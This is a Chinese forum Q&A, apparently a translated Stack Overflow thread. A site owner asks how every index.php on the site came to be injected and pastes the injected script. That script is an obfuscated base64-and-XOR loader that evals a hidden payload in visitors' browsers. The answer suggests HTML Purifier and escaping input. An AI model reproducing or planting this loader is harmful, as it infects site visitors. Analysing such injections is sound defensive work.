javascript - 我网站上的所有 index.php 文件都被黑了

Question

我网站上的所有 index.php 文件都被 body 标签中的代码注入(inject)攻击了，见下文。有谁知道他们是怎么做到的，如果有办法找到它，如何预防它？

echo "<body><script language="javascript">try { function BwrLMVnkPmRbZYpfwLH(MLJOynjaY){var iMgpLZHO="",aVwbJg,oKONbIZB,gdGJUWTs,siAOty,hPaiwMZ,NxynbqCA,VxXqcPIGHh,UclXTRxDsh,bRLAlhars;var nGBCFoc="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var OZymdhDIRb="";for(UclXTRxDsh=0;UclXTRxDsh<MLJOynjaY.length;){siAOty=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));hPaiwMZ=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));bRLAlhars=BwrLMVnkPmRbZYpfwLH;NxynbqCA=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));VxXqcPIGHh=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));aVwbJg=(siAOty<<2)+(hPaiwMZ>>4);oKONbIZB=((hPaiwMZ&15)<<4)+(NxynbqCA>>2);gdGJUWTs=((NxynbqCA&3)<<6)+VxXqcPIGHh;bRLAlhars=bRLAlhars.toString();iMgpLZHO+=String.fromCharCode(aVwbJg);if(NxynbqCA!=64)iMgpLZHO+=String.fromCharCode(oKONbIZB);if(VxXqcPIGHh!=64)iMgpLZHO+=String.fromCharCode(gdGJUWTs);}bRLAlhars=bRLAlhars.replace(/\W/g,"");bRLAlhars=bRLAlhars.split("").reverse().join("");for(UclXTRxDsh=0;UclXTRxDsh<iMgpLZHO.length;UclXTRxDsh++)OZymdhDIRb+=String.fromCharCode(iMgpLZHO.charCodeAt(UclXTRxDsh%iMgpLZHO.length)^bRLAlhars.charCodeAt(UclXTRxDsh%bRLAlhars.length));return eval(OZymdhDIRb);}BwrLMVnkPmRbZYpfwLH("QnJpZEhETVl6b0xBVmxnBBQGRRsOBgYDAExOUgUHDzQhNwwcXScKNzUsCSY5ESwAChtrUAgOERIfBEpFekZbawESFQ8ICWE/MygED21USFF1WmleUWUKMwYgCAFBKxcIDws7aGdsUlZvUm9tZioUEwkuCEEBFAROVFJWOxYmOX5HSxVULyEBEGobPTl3BQ17CxMOUVdOdEJTRRQILhwFFioMfDY3CBp7URgDIRY2FzAFDzFaBgAcCAIPTEg=");} catch(e){}</script>";*

Answer 1

我建议您使用 HTML Purifier .

HTML Purifier is a standards-compliant HTML filter library written in PHP. HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited,
secure yet permissive whitelist, it will also make sure your documents are standards compliant

此外，在要插入/更新数据库的任何值之前使用 mysql_real_escape_string 函数，并在数字之前使用 intval 以将风险降至最低。